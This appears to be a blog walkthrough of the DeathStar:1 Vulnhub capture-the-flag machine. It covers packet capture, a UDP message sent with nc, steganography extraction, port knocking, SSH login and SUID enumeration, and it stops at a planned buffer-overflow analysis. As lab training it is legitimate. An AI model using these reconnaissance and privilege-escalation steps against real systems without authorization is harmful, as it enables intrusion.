top of page

Deathstar:1 Vulnhub Walkthrough

Updated: Jun 3, 2020

In this article we are going to solve a very interesting challenge DeathStar:1 a medium rated box from vulnhub.


walkthrough



IP of the target : 192.168.43.116

As said in the description on vulnhub website that port scanning will not take us anywhere ( but my mind said I will do nmap scan).

sudo nmap -sC -sV -Pn -p- 192.168.43.116

Okay now my mind will not interfere again :)

After some time I thought to capture the packet on the target ip address using wireshark | filter used , ip.adddr == <Target-IP>

umm this information looks very useful for us.


Protocol : UDP

message1 : DS-1@OBS

message2:1440


what if 1440 is the UDP Port and DS-1@OBS is something like a key or a message that we have to send .

Okay for that we used nc to connect on port 1440 and send the message "DS-1@OBS" and then saved it in a file to analyze later if we got something.


nc -u 192.168.43.116 1440 > mymsg.txt then send message DS-1@OBS

this looks like a base64 encoded text , lets decode it and again save it in new file

okay we have a image , lets open the image by changing the extension to .jpeg

This looks super cool :)

Information gained =>

[+] Hangar Bay 327

[+] Thermal Exhaust Port (2-meter-wide)

[+] code to unlock : 197719801983 , looks like some years (1977 1980 1983)

Okay with this information we got nothing even port knocking doesn't worked on "1977" , "1980" and "1983" . So now we used steghide tool to find some hidden file if we can.


steghide extract -sf newmsg.jpeg , passphrase:******* 

I have spent a lot of time in this machine , so I am not going to tell you the passphrase in just 5 minutes .

after this we found a .txt file with a message that we need to use a particular sequence to unlock the port 10110 , this clerly means port knocking , we used a python script that I found on github for port knocking and after using the correct sequence we opened the port 10110 .

okay means SSH port is open , now we can connect on port 10110 and can gain access to user shell.

information gained =>

[+] username : erso

[+] password hint: #TryHarder :)


after doing some OSINT on the pass hint , we found the user pass on internet and used that password to connect to SSH as user erso.

first of all we checked for the user privileges using sudo -l but got nothing , now we checked for the SUID binaries using the command find / -perm -u=s -type f 2>/dev/null

I don't know why /usr/bin/mtr doesn't worked , but /bin/dartVader looks intersting for us and we tried couple of things on this binary but failed .now if we run strings command on this binary then we found some good information .

this looks vulnerable to buffer overflow attack .

to check if we are on right track we transferred this binary in our local machine and will analyze it through gdb :)